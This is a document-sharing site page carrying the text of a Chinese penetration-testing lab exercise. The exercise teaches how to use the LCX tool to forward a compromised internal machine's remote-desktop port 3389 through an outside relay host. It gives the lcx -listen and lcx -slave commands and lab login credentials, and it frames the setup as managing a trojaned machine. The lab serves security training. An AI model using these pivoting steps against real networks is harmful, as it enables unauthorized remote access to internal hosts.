• / 22
  • 下载费用:10 金币  

l002002012-隐藏信息-03端口转发实现内网突破.docx

关 键 词:
l002002012 隐藏 信息 03 端口 转发 实现 突破
资源描述:
课程编写类别内容实验课题名称WEB渗透隐藏信息03端口转发实现内网突破实验目的与要求1、了解WEB渗透端口转发实现内网突破2、熟练掌握端口转发实现内网突破实验环境VPC1虚拟PC)操作系统类型WINDOWS,网络接口本地连接VPC1连接要求PC网络接口,本地连接与实验网络直连软件描述1、学生机要求安装JAVA环境2、VPC安装WINDOWS实验环境描述1、学生机与实验室网络直连2、VPC1与实验室网络直连3、学生机与VPC1物理链路连通;预备知识在理论上只要网络连接的计算机都是可以访问的,但是在实际中往往由于技术水平等原因很难实现它。例如,局域网中的某台计算机仅仅开放了WEB服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服务,必须进行端口映射等操作才行。端口映射在渗透内网的时候经常用到,特别是要登录远程终端服务时,使用端口映射就非常方便。LCXEXE是一个端口转发工具,相当于把渗透主机A上的3389端口转发到具有外网IP地址的B机上,这样连接B机的3389端口就相当于连接A机的3389端口。LCX程序多用于被控制计算机处于内网的情况,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便。因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过LCX等程序进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。实验内容1、了解WEB渗透端口转发实现内网突破2、熟练掌握端口转发实现内网突破实验步骤学生登录实验场景的操作1、学生单击“网络拓扑”进入实验场景,单击WINDOWS2003中的“打开控制台”按钮,进入目标主机。如图所示2、学生输入账号ADMINISTRATOR,密码123456,登录到实验场景中的目标主机。如图所示图23、进入D\TOOLS,解压缩LXCRAR,如图所示,选择”解压到LXC\”4、进入D\TOOLS\LCX\LCX中,您会发现LCXEXE端口转发工具5、单击开始–运行–输入命令CMD,按下ENTER键如下图6、IPCONFIG/ALL查看本地地址(地址是自动分配的可能与该计算机的IP不一样,下面的实验要看清自己的IP)7、START打开新的DOS窗口8、进入D9、使用命令CD“D\TOOLS\LCX\LCX\”进入LCX工具目录下10、执行LCXEXE看一下帮助11、使用命令LCXEXE–LISTEN22221111在外网服务器上开启22221111监听端口12、如下图在服务器上开启了两个监听端口2222、1111,同时等待客户机连接,本地端口2222端口13、切换到底层的DOS窗口,查看监听端口使用命令NETSTAT–AN,如图所示14、单击“网络拓扑”进入实验场景,单击WINDOWSXP中的“打开控制台”按钮,进入目标主机。15、输入用户名ADMINISTRATION密码12345616、开始运行CMD回车17、进入DOS窗口18、查看本地IP地址(IPCONFIG)19、同步骤3一样,进入D\TOOLS,解压缩LXCRAR,如图所示,选择”解压到LXC\”然后,进入目录D\TOOLS\LCX\LCX,如下图所示20、运行LCX命令21、查看本地端口,是否开启远程服务;22、使用LCX–SLAVE192168113322221270013389(1921681133为WINDOWS2003的IP地址,此地址不固定)23、开始运行CMD回车,打开一个新的DOS界面24、查看会话NETSTAT–AN25、切换到WINDOWS2003控制台,查看服务状况,被渗透的机器已经连接上。26、使用远程桌面连接,进行控制连接被渗透的机器。开始所有程序附件通讯远程桌面连接27、输入1270011111,点击连接28、实验完毕,关闭所有窗口和虚拟机。
展开阅读全文
  麦档网所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。
0条评论

还可以输入200字符

暂无评论,赶快抢占沙发吧。

关于本文
本文标题:l002002012-隐藏信息-03端口转发实现内网突破.docx
链接地址:https://www.maidoc.com/p-1541.html

当前资源信息

佳佳

编号: 20180301224521324163

类型: 共享资源

格式: DOCX

大小: 1.56MB

上传时间: 2018-03-01

关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

[email protected] 2018-2020 maidoc.com版权所有  文库上传用户QQ群:3303921 

麦档网为“文档C2C模式”,即用户上传的文档所得金币直接给(下载)用户,本站只是中间服务平台,本站所有文档下载所得的金币归上传人(含作者)所有。
备案号:蜀ICP备17040478号-3  
川公网安备:51019002001290号 

本站提供办公文档学习资料考试资料文档下载


收起
展开